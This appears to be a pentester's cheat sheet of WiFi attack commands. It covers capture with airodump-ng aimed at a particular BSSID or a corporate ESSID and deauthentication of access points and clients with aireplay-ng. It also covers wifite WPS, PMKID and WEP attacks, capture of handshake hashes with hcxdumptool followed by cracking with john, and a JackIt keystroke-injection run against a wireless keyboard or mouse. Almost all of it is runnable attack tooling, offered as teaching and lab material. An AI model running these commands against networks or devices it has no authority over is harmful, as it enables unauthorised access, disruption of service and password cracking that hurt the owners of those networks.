# WiFi

## Tips

```
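# Passive survey of nearby networks
sudo kismet

# Stop services that would otherwise reconfigure the interface during capture
sudo systemctl stop NetworkManager.service
sudo systemctl stop wpa_supplicant.service

# Capture on channel 11 (-c), filtered by BSSID, writing files with the prefix "psk" (-w)
sudo airodump-ng -c 11 --bssid=D0:D3:E0:47:B0:01 -w psk wlp0s20f3mon
# Same capture, filtered by an ESSID regex instead
sudo airodump-ng -c 11 --essid-regex XX-Corporate -w psk wlp0s20f3mon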
```

## Deauth

```
# Deauthentication (-0) with count 1, using the AP's BSSID (-a)
sudo aireplay-ng -0 1 -a D0:D3:E0:47:B0:01 wlp0s20f3mon

# Target client (-c):
sudo aireplay-ng -0 1 -a D0:D3:E0:47:B0:01 -c xx:xx:xx:xx wlp0s20f3mon
```

## iwctl

```
:> iwctl

NetworkConfigurationEnabled: disabled
StateDirectory: /var/lib/iwd
Version: 2.15
[iwd]# station 
list  wlan1 
[iwd]# station wlan1 scan
[iwd]# station wlan1 get-networks 
```


## wifite

```
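sudo wifite

# WPS:
wifite -e nomedarede      # nomedarede is a placeholder for the network name (ESSID)
wifite -e rede --pmkid    # rede is a placeholder for the network name (ESSID)
wifite -c 10              # (hidden SSIDs)
wifite --wep
wifite --crack

# https://github.com/derv82/wifite2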
```

## hcxdumptool

```
sudo hcxdumptool -i wlan3 -w output
hcxpcapngtool -o hashcat output --prefix=hash2200 --john=cracking_john --all

# Get all the obtained networks (sort -u also removes non-adjacent duplicates):
cut -d ":" -f1 cracking_john | sort -u

john --wordlist=/usr/share/wordlists/wifite.txt cracking_john 
```

## nRFID

```
sudo ./jackit  --script script.txt 

[+] Scanning every 5s CTRL-C when ready.

  KEY  ADDRESS           CHANNELS    COUNT  SEEN         TYPE        PACKET
-----  --------------  ----------  -------  -----------  ----------  -----------------
    1  E7:40:62:76:02          79        2  0:03:49 ago  Amazon HID  02:FC:EF:FF:02:5D
    2  37:DD:35:EA:10  23,41             4  0:01:29 ago  Unknown  02:09:D0:FF:47


[+] Select target keys (1-1) separated by commas, or 'all':  [all]: 1   
[+] Ping success on channel 2
[+] Sending attack to E7:40:62:76:02 [Amazon HID] on channel 2

[+] All attacks completed


```

```
DELAY 500
GUI r 
DELAY 500
STRING notepad.exe  
ENTER 
DELAY 1000 
STRING Hello World! 
```

{% embed url="<https://www.blackhillsinfosec.com/executing-keyboard-injection-attacks/>" %}

## References

{% embed url="<https://tbhaxor.com/evil-twin-wifi-network-using-hostapd-mana/>" %}

{% embed url="<https://www.netprojnetworks.com/setting-up-a-wireless-pentest-lab-part-2/>" %}

{% embed url="<https://www.netprojnetworks.com/wireless-pentest-lab-part-3/>" %}
